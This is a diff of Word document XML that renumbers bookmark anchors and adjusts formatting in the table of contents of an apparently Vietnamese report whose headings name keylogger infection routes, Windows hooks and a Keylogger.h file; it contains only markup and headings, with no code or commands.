           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761756" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895345" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1936,7 +1961,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -1970,7 +1994,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761756 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895345 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2026,7 +2050,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761757" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895346" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2034,7 +2058,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2068,7 +2091,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761757 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895346 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2124,7 +2147,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761758" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895347" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2132,7 +2155,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2166,7 +2188,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761758 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895347 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2222,7 +2244,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761759" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895348" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2230,7 +2252,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2264,7 +2285,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761759 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895348 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2320,7 +2341,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761760" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895349" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2328,7 +2349,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2362,7 +2382,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761760 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895349 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2415,12 +2435,11 @@
               <w:rStyle w:val="Hyperlink"/>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
-              <w:color w:val="auto"/>
               <w:sz w:val="28"/>
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761761" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895350" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2428,7 +2447,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2462,7 +2480,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761761 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895350 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2505,7 +2523,15 @@
             </w:r>
           </w:hyperlink>
         </w:p>
-        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
@@ -2519,7 +2545,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761762" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895351" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2527,7 +2553,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2561,7 +2586,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761762 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895351 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2617,7 +2642,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761763" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895352" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2625,7 +2650,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2659,7 +2683,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761763 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895352 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2715,7 +2739,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761764" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895353" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2723,7 +2747,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2757,7 +2780,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761764 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895353 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2813,7 +2836,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761765" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895354" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2821,7 +2844,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2855,7 +2877,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761765 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895354 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2911,7 +2933,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761766" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895355" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2919,7 +2941,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -2953,7 +2974,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761766 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895355 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3009,7 +3030,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761767" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895356" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3017,7 +3038,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -3051,7 +3071,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761767 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895356 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3081,6 +3101,309 @@
                 <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+              <w:u w:val="single"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc60895357" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>1.6. Con đường lây nhiễm Keylogger</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895357 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc60895358" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>*/ Tiểu kết chương 1:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895358 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc60895359" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>CHƯƠNG II: PHÂN TÍCH PROJECT KEYLOGGER</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895359 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3107,7 +3430,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761768" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895360" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3115,11 +3438,10 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>1.6. Con đường lây nhiễm Keylogger</w:t>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.1. Giới thiệu về Hook</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3149,206 +3471,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761768 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>12</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rStyle w:val="Hyperlink"/>
-              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              <w:noProof/>
-              <w:color w:val="auto"/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761769" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>*/ Tiểu kết chương 1:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761769 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>14</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p/>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761770" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>CHƯƠNG II: PHÂN TÍCH PROJECT KEYLOGGER</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761770 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895360 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3404,7 +3527,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761771" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895361" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3412,11 +3535,10 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>2.1. Giới thiệu về Hook</w:t>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.2. File Keylogger.h</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3446,7 +3568,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761771 \h </w:instrText>
